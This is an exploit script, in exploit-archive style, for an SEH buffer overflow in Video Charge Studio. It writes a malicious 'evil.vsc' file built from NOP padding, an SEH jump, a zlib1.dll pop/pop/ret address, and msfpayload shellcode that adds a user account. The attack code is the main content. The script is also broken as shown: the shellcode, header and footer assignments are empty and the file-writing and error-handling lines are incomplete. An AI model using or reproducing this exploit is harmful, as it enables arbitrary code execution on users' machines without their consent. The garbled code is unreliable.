# Exploit Title: Video Charge Studio <= (.vsc) Buffer Overflow (SEH)
# Date: 12/05/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: <= (Latest)
# Tested on: Windows XP SP3 (Physical machine)
# CVE: N/A
### Software Description: ###
# Videocharge Studio is a video editing software which is intended for those users who
# regularly work with video, create Internet video galleries, convert video files.
# Videocharge Studio includes all features for video editing: video converting, splitting
# video into parts, joining several video files into a single one, adding watermark on
# video or image (add logo to video or photo), embedding image into video file, creating
# video from several images, editing audio. Videocharge Studio can edit video without
# reencoding as well.
### Exploit information: ###
# Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc files
# "Filename" value field.
# An attacker could trick a user into loading a specially crafted vsc file to execute
# arbitrary code on a users PC without there consent.
### Shouts: ###
# kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
# Have fun!
# "When you know that you're capable of dealing with whatever comes, you have the only
# security the world has to offer." -Harry Browne
import struct
import sys
about = "=================================================\n"
about +=" Video Charge Studio <= (.vsc) BoF (SEH)\n"
about +=" Author: xsploited security\n URL: http://www.x-sploited.com/\n"
about +=" Contact: xsploitedsecurity [at] gmail.com\n"
about +="=================================================\n"
print about
# msfpayload windows/adduser user=xsploited pass=secEXITFUNC=seh
# R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b '\x00\x09\x0a
# \x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07' > /tmp/encoded.txt
# [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)
shellcode = (
header = (
footer = (
size = 824; #824 junk bytes triggers the bof
payload = "\x90" * (size - len(shellcode));
payload += shellcode
payload += "\xEB\x06\x90\x90"; #jmp short
payload += struct.pack("<L",0x61B8451C); #universal p/p/r - zlib1.dll (Apps path)
payload += "\xe9\xe0\xfc\xff\xff"; #jmp back 800 bytes
xsploit = header + payload+ footer;
print("[*] Creating .vsc file");
print "[*] Payload size = " + str(len(payload)) + " bytes";
out_file = open("evil.vsc",'w');
print("[*] Malicious vsc file created successfully");
print("[*] Launch Video Charge Studio and load the file\n[*] Exiting...\r\n");
print "[!] Error creating file";